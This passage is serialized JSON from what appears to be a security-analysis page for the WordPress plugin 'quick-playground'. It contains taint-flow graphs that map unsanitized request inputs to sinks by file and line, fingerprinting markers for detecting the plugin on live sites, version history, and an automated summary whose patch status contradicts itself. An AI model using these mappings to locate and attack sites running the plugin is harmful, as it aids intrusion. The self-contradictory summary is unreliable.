(expro-quickplayground-sync.php:0)",{"nodes":511,"edges":518},[512,513,514,515,516,517],{"id":353,"type":354,"label":493,"file":50,"line":494},{"id":359,"type":364,"label":375,"file":50,"line":496,"wp_function":377},{"id":363,"type":354,"label":475,"file":50,"line":498},{"id":368,"type":364,"label":424,"file":50,"line":500,"wp_function":426},{"id":371,"type":354,"label":475,"file":50,"line":498},{"id":374,"type":364,"label":365,"file":50,"line":503,"wp_function":366},[519,520,521],{"from":353,"to":359,"sanitized":429},{"from":363,"to":368,"sanitized":429},{"from":371,"to":374,"sanitized":429},{"entryPoint":523,"graph":524,"unsanitizedCount":11,"severity":430},"qckply_iframe (qckply-iframe.php:36)",{"nodes":525,"edges":534},[526,529,530,533],{"id":353,"type":354,"label":527,"file":235,"line":528},"$_SERVER['REQUEST_URI']",87,{"id":359,"type":364,"label":365,"file":235,"line":528,"wp_function":366},{"id":363,"type":354,"label":531,"file":235,"line":532},"$_GET (x2)",51,{"id":368,"type":364,"label":365,"file":235,"line":86,"wp_function":366},[535,536],{"from":353,"to":359,"sanitized":429},{"from":363,"to":368,"sanitized":429},{"entryPoint":538,"graph":539,"unsanitizedCount":11,"severity":430},"\u003Cqckply-iframe> (qckply-iframe.php:0)",{"nodes":540,"edges":545},[541,542,543,544],{"id":353,"type":354,"label":527,"file":235,"line":528},{"id":359,"type":364,"label":365,"file":235,"line":528,"wp_function":366},{"id":363,"type":354,"label":531,"file":235,"line":532},{"id":368,"type":364,"label":365,"file":235,"line":86,"wp_function":366},[546,547],{"from":353,"to":359,"sanitized":429},{"from":363,"to":368,"sanitized":429},{"entryPoint":549,"graph":550,"unsanitizedCount":11,"severity":430},"qckply_json_upload (qckply_upload.php:3)",{"nodes":551,"edges":555},[552,554],{"id":353,"type":354,"label":553,"file":299,"line":184},"$_FILES",{"id":359,"type":364,"label":365,"file":299,"line":450,"wp_function":366},[556],{"from":353,"to":359,"sanitized":429},{"entryPoint":558,"graph":559,"unsanitizedCount":11,"severity":430},"\u003Cqckply_upload> (qckply_upload.php:0)",{"nodes":560,"edges":563},[561,562],{"id":353,"type":354,"label":553,"file":299,"line":184},{"id":359,"type":364,"label":365,"file":299,"line":450,"wp_function":366},[564],{"from":353,"to":359,"sanitized":429},{"entryPoint":566,"graph":567,"unsanitizedCount":25,"severity":430},"qckply_main (quick-playground.php:43)",{"nodes":568,"edges":572},[569,570,571],{"id":353,"type":354,"label":355,"file":51,"line":74},{"id":359,"type":360,"label":361,"file":51,"line":74},{"id":363,"type":364,"label":365,"file":315,"line":316,"wp_function":366},[573,574],{"from":353,"to":359,"sanitized":53},{"from":359,"to":363,"sanitized":53},{"entryPoint":576,"graph":577,"unsanitizedCount":25,"severity":430},"\u003Cquick-playground> (quick-playground.php:0)",{"nodes":578,"edges":582},[579,580,581],{"id":353,"type":354,"label":355,"file":51,"line":74},{"id":359,"type":360,"label":361,"file":51,"line":74},{"id":363,"type":364,"label":365,"file":315,"line":316,"wp_function":366},[583,584],{"from":353,"to":359,"sanitized":53},{"from":359,"to":363,"sanitized":53},{"entryPoint":586,"graph":587,"unsanitizedCount":11,"severity":430},"qckply_clone_page (quickplayground_design_clone.php:6)",{"nodes":588,"edges":595},[589,590,592,594],{"id":353,"type":354,"label":355,"file":337,"line":335},{"id":359,"type":364,"label":365,"file":337,"line":591,"wp_function":366},33,{"id":363,"type":354,"label":593,"file":337,"line":228},"$_POST['target']",{"id":368,"type":364,"label":365,"file":337,"line":228,"wp_function":366},[596,597],{"from":353,"to":359,"sanitized":429},{"from":363,"to":368,"sanitized":429},{"entryPoint":599,"graph":600,"unsanitizedCount":11,"severity":430},"\u003Cquickplayground_design_clone> (quickplayground_design_clone.php:0)",{"nodes":601,"edges":606},[602,603,604,605],{"id":353,"type":354,"label":355,"file":337,"line":335},{"id":359,"type":364,"label":365,"file":337,"line":591,"wp_function":366},{"id":363,"type":354,"label":593,"file":337,"line":228},{"id":368,"type":364,"label":365,"file":337,"line":228,"wp_function":366},[607,608],{"from":353,"to":359,"sanitized":429},{"from":363,"to":368,"sanitized":429},{"summary":610,"deductions":611},"The 'quick-playground' plugin v1.3.2 exhibits a generally good security posture, with a strong emphasis on prepared SQL statements and proper output escaping, indicating developers are aware of common web vulnerabilities. The plugin also demonstrates robust use of nonce and capability checks for its identified entry points, minimizing direct exposure. However, the presence of the `move_uploaded_file` function is a significant concern. While not immediately flagged as a critical taint flow in this analysis, the potential for insecure file handling, especially if user-controlled data influences the destination path or filename, represents a notable risk vector.\n\nThe vulnerability history, specifically a past critical CVE related to Missing Authorization, is a significant red flag. While currently unpatched, this suggests a recurring weakness or a past incident that, if not thoroughly addressed and mitigated in subsequent versions, could resurface. The fact that the last vulnerability was recorded as being in the future (2026-04-08) is highly unusual and likely an artifact of the data provided; however, it still points to a past critical issue that needs careful consideration.\n\nIn conclusion, while 'quick-playground' has strengths in its defensive coding practices like prepared statements and output escaping, the `move_uploaded_file` function and the history of a critical Missing Authorization vulnerability warrant careful scrutiny and potential mitigation strategies to ensure the plugin's overall security.",[612,614,616],{"reason":613,"points":184},"Critical CVE in history, even if patched",{"reason":615,"points":181},"Dangerous function: move_uploaded_file",{"reason":617,"points":215},"Taint flows with unsanitized paths","2026-04-16T14:18:07.392Z",{"wat":620,"direct":628},{"assetPaths":621,"generatorPatterns":623,"scriptPaths":624,"versionParams":626},[622],"\u002Fwp-content\u002Fplugins\u002Fquick-playground\u002Fquick-playground.php",[],[625],"\u002Fwp-content\u002Fplugins\u002Fquick-playground\u002Fquick-playground.js",[627],"quick-playground\u002Fquick-playground.js?ver=",{"cssClasses":629,"htmlComments":636,"htmlAttributes":637,"restEndpoints":644,"jsGlobals":645,"shortcodeOutput":646},[630,631,632,633,634,635],"qckply-doc","qckply-form","qckply-theme-previews","qckply-stylesheet","qckply-theme-screenshot","qckply-theme-button",[],[638,639,640,641,642,643],"name=\"build_profile\"","name=\"playground\"","name=\"theme_blueprint[]\"","name=\"theme_name[]\"","name=\"settings[page_on_front]\"","name=\"settings[qckply_key_pages]\"",[],[],[],{"slug":4,"current_version":6,"total_versions":307,"versions":648},[649,654,662,670,678,686,694,702,710,718,726,734,741,749,757,765],{"version":6,"download_url":23,"svn_tag_url":650,"released_at":34,"has_diff":53,"diff_files_changed":651,"diff_lines":34,"trac_diff_url":652,"vulnerabilities":653,"is_current":429},"https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.3.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.3.1&new_path=%2Fquick-playground%2Ftags%2F1.3.2",[],{"version":655,"download_url":656,"svn_tag_url":657,"released_at":34,"has_diff":53,"diff_files_changed":658,"diff_lines":34,"trac_diff_url":659,"vulnerabilities":660,"is_current":53},"1.3.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.3.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.3.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.3&new_path=%2Fquick-playground%2Ftags%2F1.3.1",[661],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":663,"download_url":664,"svn_tag_url":665,"released_at":34,"has_diff":53,"diff_files_changed":666,"diff_lines":34,"trac_diff_url":667,"vulnerabilities":668,"is_current":53},"1.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.2.1&new_path=%2Fquick-playground%2Ftags%2F1.3",[669],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":671,"download_url":672,"svn_tag_url":673,"released_at":34,"has_diff":53,"diff_files_changed":674,"diff_lines":34,"trac_diff_url":675,"vulnerabilities":676,"is_current":53},"1.2.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.2.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.2.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.2&new_path=%2Fquick-playground%2Ftags%2F1.2.1",[677],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":679,"download_url":680,"svn_tag_url":681,"released_at":34,"has_diff":53,"diff_files_changed":682,"diff_lines":34,"trac_diff_url":683,"vulnerabilities":684,"is_current":53},"1.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.1&new_path=%2Fquick-playground%2Ftags%2F1.2",[685],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":687,"download_url":688,"svn_tag_url":689,"released_at":34,"has_diff":53,"diff_files_changed":690,"diff_lines":34,"trac_diff_url":691,"vulnerabilities":692,"is_current":53},"1.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.0.9&new_path=%2Fquick-playground%2Ftags%2F1.1",[693],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":695,"download_url":696,"svn_tag_url":697,"released_at":34,"has_diff":53,"diff_files_changed":698,"diff_lines":34,"trac_diff_url":699,"vulnerabilities":700,"is_current":53},"1.0.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.0.9.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.0.9\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.0.8&new_path=%2Fquick-playground%2Ftags%2F1.0.9",[701],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":703,"download_url":704,"svn_tag_url":705,"released_at":34,"has_diff":53,"diff_files_changed":706,"diff_lines":34,"trac_diff_url":707,"vulnerabilities":708,"is_current":53},"1.0.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.0.8.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.0.8\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.0.7&new_path=%2Fquick-playground%2Ftags%2F1.0.8",[709],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":711,"download_url":712,"svn_tag_url":713,"released_at":34,"has_diff":53,"diff_files_changed":714,"diff_lines":34,"trac_diff_url":715,"vulnerabilities":716,"is_current":53},"1.0.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.0.7.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.0.7\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.0.6&new_path=%2Fquick-playground%2Ftags%2F1.0.7",[717],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":719,"download_url":720,"svn_tag_url":721,"released_at":34,"has_diff":53,"diff_files_changed":722,"diff_lines":34,"trac_diff_url":723,"vulnerabilities":724,"is_current":53},"1.0.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.0.6.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.0.6\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.0.5&new_path=%2Fquick-playground%2Ftags%2F1.0.6",[725],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":727,"download_url":728,"svn_tag_url":729,"released_at":34,"has_diff":53,"diff_files_changed":730,"diff_lines":34,"trac_diff_url":731,"vulnerabilities":732,"is_current":53},"1.0.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.0.5.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.0.5\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.0.4&new_path=%2Fquick-playground%2Ftags%2F1.0.5",[733],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":98,"download_url":735,"svn_tag_url":736,"released_at":34,"has_diff":53,"diff_files_changed":737,"diff_lines":34,"trac_diff_url":738,"vulnerabilities":739,"is_current":53},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.0.4.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.0.4\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.0.3&new_path=%2Fquick-playground%2Ftags%2F1.0.4",[740],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":742,"download_url":743,"svn_tag_url":744,"released_at":34,"has_diff":53,"diff_files_changed":745,"diff_lines":34,"trac_diff_url":746,"vulnerabilities":747,"is_current":53},"1.0.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.0.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.0.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.0.2&new_path=%2Fquick-playground%2Ftags%2F1.0.3",[748],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":750,"download_url":751,"svn_tag_url":752,"released_at":34,"has_diff":53,"diff_files_changed":753,"diff_lines":34,"trac_diff_url":754,"vulnerabilities":755,"is_current":53},"1.0.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.0.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.0.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.0.1&new_path=%2Fquick-playground%2Ftags%2F1.0.2",[756],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":758,"download_url":759,"svn_tag_url":760,"released_at":34,"has_diff":53,"diff_files_changed":761,"diff_lines":34,"trac_diff_url":762,"vulnerabilities":763,"is_current":53},"1.0.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.0.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.0.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.0&new_path=%2Fquick-playground%2Ftags%2F1.0.1",[764],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":766,"download_url":767,"svn_tag_url":768,"released_at":34,"has_diff":53,"diff_files_changed":769,"diff_lines":34,"trac_diff_url":34,"vulnerabilities":770,"is_current":53},"1.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.0\u002F",[],[771],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6}]